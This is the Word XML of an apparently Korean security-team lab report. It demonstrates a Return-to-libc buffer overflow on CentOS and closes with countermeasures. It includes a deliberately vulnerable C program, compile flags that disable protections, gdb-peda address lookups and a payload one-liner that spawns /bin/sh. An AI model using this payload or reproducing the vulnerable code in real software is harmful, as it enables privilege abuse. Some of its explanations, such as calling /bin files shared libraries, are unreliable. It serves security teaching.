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e7e6e6">
    <v:background id="_x0000_s1025" o:bwmode="white" o:targetscreensize="1024,768" filled="t" fillcolor="#e7e6e6"/>
  </w:background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  <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>보안팀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lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>buffer overflow attack(rtl)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lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">Return To Libc attack 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/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/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/>
    <w:p/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1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>
        <w:trPr>
          <w:trHeight w:val="31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top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p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현재 오버플로우 공격은 각종 메모리 보호 기법, ASLR기법 등등 각종 보호기법들로 인하여 공격이 거의 불가능하다.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따라서 해당하는 보호기법들을 우회하기 위하여 등장한 것이 RTL 공격이다.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이 공격을 활용하면, 리눅스 메모리 보호 기법 중의 하나인 NX bit를 우회하여 공격을 수행하는 것이 가능하다.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>NX bit란 stack 상에 올라오는 여러 함수나, 코드들의 실행 권한을 제거함으로써, stack의 RET주소에 예상치 못한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쉘 코드 등이 덮어씌워져 오버플로우 공격이 발생하는 것을 방지하기 위한 메모리 보호 기법이다.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RTL 공격은 return to libc의 약자로 메모리에 이미 적재되어 있는 공유 라이브러리를 이용한 공격으로, 우리가 실행한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컴파일한 코드에 원하는 함수나 쉘 코드 등이 없어도, 공유 라이브러리에서 원하는 함수의 사용이 가능하다.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>공격자 입장에서는 root권한으로 우선 접속한 후에 /bin 하위의 여러 실행파일을 자신이 만든 실행파일로 교체하여 해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당 파일을 임의로 실행시킬 수 있고, 정상적인 실행파일들을 자기맘대로 실행시키는 것이 가능해진다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr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왜냐하면, /bin/하위의 파일들은 메모리에 이미 적재되어 있는 공유 라이브러리 이기 때문이다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="90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최종적으로 정리를 해보자면, 웬만한 버퍼오버플로우 공격은 현존하는 서버에서 거의 다 막혀있다.</w:t>
            </w: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color w:val="FF0000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 xml:space="preserve">그러나, RTL공격 기법을 활용하면, 버퍼오버플로우 공격이 현존하는 서버에서도 가능하다.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 xml:space="preserve">매우 심각한 취약점이라는 의미이다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="26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>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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trHeight w:val="425" w:hRule="atLeast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873" w:hRule="atLeast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X국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>2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  <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>(해당 취약점은 centos 7, 8 에서도 현존)</w:t>
            </w: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color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>1)</w:t>
            </w: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sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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>우선적으로 코드분석, 메모리 분석, 스택구조 파악, 어셈블리어로 디컴파일, 파일 및 함수 위치 찾기 등을 하기 위하여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> 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 xml:space="preserve"> gdb-peda 를 설치해준다.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 xml:space="preserve">  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 xml:space="preserve"> gdb-peda는 gdb의 확장버전으로 gdb에 비하여 좀 더 자세하게 파일을 디버깅할 수 있는 기능을 제공하고, 파일 및 함수의 위치를 쉽게 찾을 수 있는 것이 장점이다.</w:t>
            </w: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sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 아래는 gdb-peda 설치 방법이다.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4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rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t>sudo yum install git</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">// git 다운로드 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t>git clone https://github.com/longld/peda.git ~/peda</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">// github에서 peda.git 가져와서 현재디렉터리/peda에 복사 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t>echo "source ~/peda/peda.py" &gt;&gt; ~./gdbinit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t>// 기존 gdb실행경로인 gdbinit에 위에서 /peda에 넣어둔 peda.py 덮어씌움.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
              </w:rPr>
              <w:t>echo "Done! debug your program with gdb and enjoy"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default"/>
              </w:rPr>
              <w:t>// gdb-peda 설치가 완료되었습니다!!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2)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인제 rtl 공격을 위해서 간단한 코드를 작성해보도록 하자. 아래는 예시 코드이다. </w:t>
            </w:r>
          </w:p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>프로그래머의 입장에서는 프로그래밍시에 아래와 같은 식의 코드를 절대 작성해서는 안된다.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</w:t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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>#include &lt;stdio.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>int main(){</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>char buf[100];</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>read(0,buf,200);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> //하단에 read함수의 원형을 설명해보겠다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>printf("%s\n",buf);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/>
              <w:t>}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rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>&lt;read 함수 원형 설명&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default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#include &lt;unistd.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default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ssize_t read(int fd, void *buf, size_t nbytes);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before="0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int fd --&gt;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 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읽을 파일의 파일 지시자를 의미한다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before="0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void *buf --&gt;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 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읽어들인 데이터를 저장할 버퍼(배열</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before="0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 w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>s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ize_t nbytes --&gt;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 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읽어들일 데이터의 최대 길이(buf의 길이보다 길어선 안된다. --&gt; 오버플로우 발생 가능)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before="0"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default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반환값 --&gt; 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읽어들인 데이터의 길이를 반환해준다. 무조건 nbytes가 리턴되는 것은 아니고, 중간에 파일의 끝을 만나게 되면, 거기까지만 읽어서 반환해준다. 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따라서 위의 코드처럼 작성하게 되면, buf의 사이즈는 100을 선언해주었는데, 읽어들일 데이터의 최대 길이는 200까지 받아들임으로써 버퍼오버플로우 공격이 발생할 수 있다. </w:t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3)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위에 작성한 rtl.c파일을 gcc로 컴파일 하기 전에 오류를 잡아주기 위하여 하단의 라이브러리를 설치해준다. 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default"/>
              </w:rPr>
              <w:t>yum install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686</w:t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4)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그러고 나서 컴파일을 실시해준다.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gcc -m32 -mpreferred-stack-boundary=2 -fno-stack-protector -fno-pic --no-pie -o rtl rtl.c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위와 같이 컴파일 해주는 이유는 각종 메모리 보호 기법 및 ASLR기법을 해제하는 것이 가능하다. 다만, nx비트 보호기법 등은 위의 방법으로 해제하지 못하여 rtl공격을 시도하는 것이다. </w:t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5)</w:t>
            </w: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 위의 명령어로 컴파일을 해주었다면, gdb-peda도구를 사용하여 main함수를 어셈블리어로 변환한다. 하단에 그 결과를 첨부하였다. (명령어 disas main)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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5562600" cy="347472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474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ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before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main 함수 disassemble 한 결과 함수가 실행되면서 메모리상에 어떠한 구조로 배치되고, 어느정도의 메모리 크기를 가지는지 등의 정보를 확인이 가능하다. 위를 살펴보면, +14라인에 ebp-0x64로 인해서 버퍼를 100사이즈 만큼 할당한다는 것을 알 수 있다. 통상 함수가 실행될때, 버퍼사이즈 후에 4bytes 만큼 sfp를 할당해 준 후에 ret 영역이 할당된다</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>.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color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>6)</w:t>
            </w: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sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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>오버플로우를 발생시키기 위해서는 104bytes를 쓰레기 값으로 채워준 후에 ret영역에 접근하여 ret영역을 다른 값으로 덮어씌워서 발생시킨다. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:caps w:val="off"/>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="Avenir"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">하단에 자세한 설명이 있다. </w:t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ind w:firstLine="0"/>
              <w:spacing w:after="336" w:before="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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ret영역에 system 함수를 호출하여, /bin/sh파일을 강제로 실행하는 오버플로우 공격을 하고자 한다. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>해당 공격을 하기 위하여 우선, system 함수의 주소와 /bin/sh파일의 주소를 알아내야 한다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="default"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 해당 함수와 파일의 주소를 알기 위하여 gdb-peda를 이용한다. 해당 도구를 이용하여 main함수에 breakpoint를 걸어준 후에 system함수의 주소부터 찾고, /bin/sh 파일의 주소를 찾아내야 한다. 하단은 일련의 과정을 캡쳐한 것이다.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drawing>
                <wp:inline distT="0" distB="0" distL="180" distR="180">
                  <wp:extent cx="5056859" cy="396042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859" cy="3960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80" distR="180">
                  <wp:extent cx="4908408" cy="896620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408" cy="896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743200" cy="53340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09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caps w:val="off"/>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="Avenir" w:hint="eastAsia"/>
                <w:b w:val="0"/>
                <w:i w:val="0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위의 결과에서 볼 수 있듯이, system함수의 주소는 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>0xf7e35fa0으로 확인하였다.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/bin/sh파일의 주소는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:caps w:val="off"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:cs="Avenir"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0xf7f77115로 확인하였다. </w:t>
            </w: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19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>7) 최종 공격 페이로드</w:t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default"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(python -c 'print "A"*104 + "\xa0\x5f\xe3\xf7" + "AAAA" + "\x15\x71\xf7\xf7"'; cat) | ./rtl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="684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쓰레기값인 A를 버퍼에 채워준 후에, ret값을 system함수와, /bin/sh파일의 주소로 채워준다. </w:t>
            </w:r>
          </w:p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하단에 결과를 첨부하였다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="6813974" cy="477774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974" cy="4777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6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6" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8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위를 보면 알 수 있듯이, 전혀 다른 함수인 /bin/sh가 실행된 것을 확인할 수 있다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="426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tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p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trHeight w:val="80" w:hRule="atLeast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behindDoc="1" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251676672" allowOverlap="1" hidden="0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0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1031" name="shape1031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style="position:absolute;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;v-text-anchor:middle;mso-wrap-style:square;z-index:-251676672" o:allowincell="t" filled="t" fillcolor="#ffffff" stroked="f">
                      <v:fill opacity="27525f"/>
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="873" w:hRule="atLeast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>
        <w:trPr>
          <w:trHeight w:val="637" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders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1) ASLR기법을 적용해주도록 한다. ASLR기법은 프로그램이 실행될 시에 배치받는 메모리 주소를 항상 랜덤하게 배치하여, RET주소를 알아내기 힘들게 만드는 기법이다. 오버플로우 공격을 효과적으로 막는다. </w:t>
            </w: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ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:p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2) root로의 접근을 확실히 차단한다. rtl 공격은 여러가지 방지 대책을 사용한다고 해도, 라이브러리 자체를 탈취하는 공격이기 때문에, root계정을 확실히 보호하도록 한다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="266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646" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686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sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">3) ASCII-Armor란 방법을 사용한다. 이는 공격자가 라이브러리를 호출하는 buffer overflow공격을 해도 null 바이트가 삽입된 주소로는 접근하는 것이 불가능하다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425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266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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:widowControl/>
        <w:wordWrap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TableGrid"/>
        <w:tblW w:w="1068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0686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="80" w:hRule="atLeast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behindDoc="1" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251679744" allowOverlap="1" hidden="0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0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1032" name="shape1032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style="position:absolute;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;v-text-anchor:middle;mso-wrap-style:square;z-index:-251679744" o:allowincell="t" filled="t" fillcolor="#ffffff" stroked="f">
                      <v:fill opacity="27525f"/>
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="873" w:hRule="atLeast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thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders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lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">해당 공격은 보안대책을 적용하여도, 프로그래머가 실수를 범할시에 충분히 다시 일어날 수 있는 공격이다. </w:t>
            </w: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pStyle w:val="ListParagraph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4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>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38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DX인생극장B">
    <w:family w:val="roman"/>
    <w:altName w:val="바탕"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028000D" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DX국민시대">
    <w:panose1 w:val="02020600FFFFFFFFFFFF"/>
    <w:family w:val="roman"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028000D" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="D2Coding">
    <w:panose1 w:val="020B0609020101020101"/>
    <w:family w:val="modern"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:sig w:usb0="800002EF" w:usb1="79D7FDFB" w:usb2="00000034" w:usb3="00000001" w:csb0="00080001" w:csb1="00000001"/>
  </w:font>
  <w:font w:name="Avenir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DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:widowControl w:val="off"/>
      <w:wordWrap w:val="off"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="머리글 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal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Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:p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Char0">
    <w:name w:val="바닥글 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Normal"/>
  </w:style>
  <w:style w:type="table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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg" /><Relationship Id="rId3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2020-12-20T13:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-22T08:26:37Z</dcterms:modified>
  <cp:version>0900.0001.01</cp:version>
</cp:coreProperties>
</file>